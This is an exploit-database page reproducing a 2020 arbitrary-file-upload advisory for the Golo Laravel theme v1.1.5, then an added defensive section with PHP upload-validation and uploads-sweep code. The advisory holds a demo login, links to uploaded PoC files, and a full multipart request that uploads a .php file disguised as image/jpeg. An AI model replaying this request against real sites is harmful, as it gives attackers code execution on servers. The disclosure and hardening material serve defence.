Golo - Business Listing, City Travel Guide Laravel Theme v1.1.5 - Arbitrary File Upload

| CVE | Category | Price | Severity |
| --- | --- | --- | --- |
|  | CWE-434 | Not specified | High |

| Author | Risk | Exploitation Type | Date |
| --- | --- | --- | --- |
| Exploitalert Team | High | Remote | 2020-07-13 |

CPE: cpe:cpe:/a:golothemes:golo_business_listing_city_travel_guide_theme_v1.1.5
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070070

Below is a copy:

Golo - Business Listing, City Travel Guide Laravel Theme v1.1.5 - Arbitrary File Upload
[+] Exploit Title: Golo - Business Listing, City Travel Guide Laravel Theme v1.1.5 - Arbitrary File Upload
[+] Google Dork: n/a
[+] Date: 2020-07-02
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Uxper [ http://uxper.co ]
[+] Software Version: 1.1.5
[+] Software Link: https://codecanyon.net/item/golo-city-guide-laravel-theme/25785389
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-434



### [ Info: ]

[i] An Arbitrary File Upload vulnerability was discovered in the Golo Laravel theme v1.1.5.

[i] Demo account: [email protected] / ASKDU@$HDNAJFN@# (login / password)

[i] PoC Link #1: https://lara-business.getgolo.com/uploads/5f09c6d90c71c_1594476249.php

[i] PoC Link #2: https://lara-business.getgolo.com/uploads/5f09c6dcdde81_1594476252.php

[i] PoC Link #3: https://lara-business.getgolo.com/uploads/5f09c6df3b17d_1594476255.php

[i] PoC Link #4: https://lara-business.getgolo.com/uploads/5f09c3f7ec959_1594475511.svg



### [ PoC: ]

[!] POST /place HTTP/1.1
Host: lara-business.getgolo.com
Content-Type: multipart/form-data; boundary=---------------------------24734096191242901897977687797
Content-Length: 4732
Origin: https://lara-business.getgolo.com
Referer: https://lara-business.getgolo.com/new-place
Cookie: [cookies_here]

-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="_token"

i6gbRoTMcw6JP9U23pHR3b2IvxSDGrHSPJBroucJ
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="en[name]"

Night City
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="price_range"

4
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="en[description]"

PoC
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="category[]"

20
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="place_type[]"

33
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="amenities[]"

13
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="amenities[]"

9
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="amenities[]"

6
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="country_id"

11
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="city_id"

26
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="address"

31337
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="lat"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="lng"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="email"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="phone_number"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="website"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="social[0][name]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="social[0][url]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[0][title]"

Monday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[0][value]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[1][title]"

Tuesday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[1][value]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[2][title]"

Wednesday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[2][value]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[3][title]"

Thursday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[3][value]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[4][title]"

Friday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[4][value]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[5][title]"

Saturday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[5][value]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[6][title]"

Sunday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[6][value]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="thumb"; filename="vladvector.php"
Content-Type: image/jpeg


<?php
phpinfo();
?>
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="gallery[]"

vladvector.php
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="video"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="place_id"


-----------------------------24734096191242901897977687797--
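The request above shows the two inputs a vulnerable upload handler trusts and should not: the client-supplied filename (`vladvector.php`) and the client-supplied part `Content-Type` (`image/jpeg`). The following is an added example from the editor, not code from the advisory or from the Golo theme, showing how a Laravel/PHP upload handler can decide from the file's bytes instead, store under a server-chosen name and extension, and how an operator can sweep an existing `uploads/` directory for files like the `*_1594476249.php` entries the advisory lists. All function names, the `$storageDir` argument and the size limit are hypothetical.

```php
<?php
// Added example, not part of the advisory or the Golo theme.
// Defender-side handling of a "thumb"/"gallery[]" upload: the request's
// filename and Content-Type are ignored; the bytes decide; the stored name
// and extension are chosen by the server. Names below are hypothetical.

declare(strict_types=1);

// Raster image types accepted, keyed by content-detected MIME type.
// SVG is deliberately absent: it is XML and can carry script, and the
// advisory shows an .svg being accepted next to the .php files.
const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
    'image/webp' => 'webp',
];

/**
 * Validate an uploaded file from its content only.
 * Returns the extension to store it under, or null if it must be rejected.
 */
function validateImageUpload(string $tmpPath, int $maxBytes = 5 * 1024 * 1024): ?string
{
    if (!is_uploaded_file($tmpPath) || filesize($tmpPath) > $maxBytes) {
        return null;
    }

    // MIME type from the bytes, never from the multipart part's Content-Type.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($tmpPath);
    if ($mime === false || !isset(ALLOWED_IMAGE_TYPES[$mime])) {
        return null;
    }

    // getimagesize() must agree; "<?php phpinfo(); ?>" sent as image/jpeg fails here.
    $info = @getimagesize($tmpPath);
    if ($info === false || ($info['mime'] ?? '') !== $mime) {
        return null;
    }

    // Secondary check: refuse a PHP open tag anywhere in the body. "<?php" is
    // used rather than "<?" because JPEG XMP metadata legitimately contains "<?xpacket".
    $data = file_get_contents($tmpPath);
    if ($data === false || stripos($data, '<?php') !== false) {
        return null;
    }

    return ALLOWED_IMAGE_TYPES[$mime];
}

/**
 * Store a validated upload under a random, server-chosen name and extension
 * in $storageDir (hypothetical; ideally outside the web root). Returns the
 * stored path, or null on rejection.
 */
function storeImageUpload(string $tmpPath, string $storageDir): ?string
{
    $ext = validateImageUpload($tmpPath);
    if ($ext === null) {
        return null;
    }
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($storageDir, '/') . '/' . $name;
    if (!move_uploaded_file($tmpPath, $dest)) {
        return null;
    }
    chmod($dest, 0644); // readable, never executable
    return $dest;
}

/**
 * Incident-response sweep of an existing uploads directory: report files whose
 * extension is not an allowed image type or whose first 4 KiB contain a PHP tag.
 */
function findSuspiciousUploads(string $uploadsDir): array
{
    $allowedExt = array_flip(ALLOWED_IMAGE_TYPES) + ['jpeg' => 'image/jpeg'];
    $hits = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($uploadsDir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if (!$file->isFile()) {
            continue;
        }
        $path = $file->getPathname();
        $ext  = strtolower($file->getExtension());
        $head = (string) file_get_contents($path, false, null, 0, 4096);
        if (!isset($allowedExt[$ext]) || stripos($head, '<?php') !== false) {
            $hits[] = $path;
        }
    }
    return $hits;
}

// CLI use for the sweep: php upload_check.php /var/www/app/public/uploads
if (PHP_SAPI === 'cli' && isset($argv[1])) {
    foreach (findSuspiciousUploads($argv[1]) as $path) {
        echo $path, PHP_EOL;
    }
}
```

Content validation on its own is not the whole fix: the `uploads/` directory should also be served by the web server with script execution disabled (or, better, live outside the document root and be served through a controller), so that a file which slips past validation still cannot run as PHP. In the advisory's PoC both layers are missing, which is why a request with `filename="vladvector.php"` and a spoofed `image/jpeg` part produces a directly reachable `.php` under `/uploads/`.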



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector

Copyright ©2024 Exploitalert.
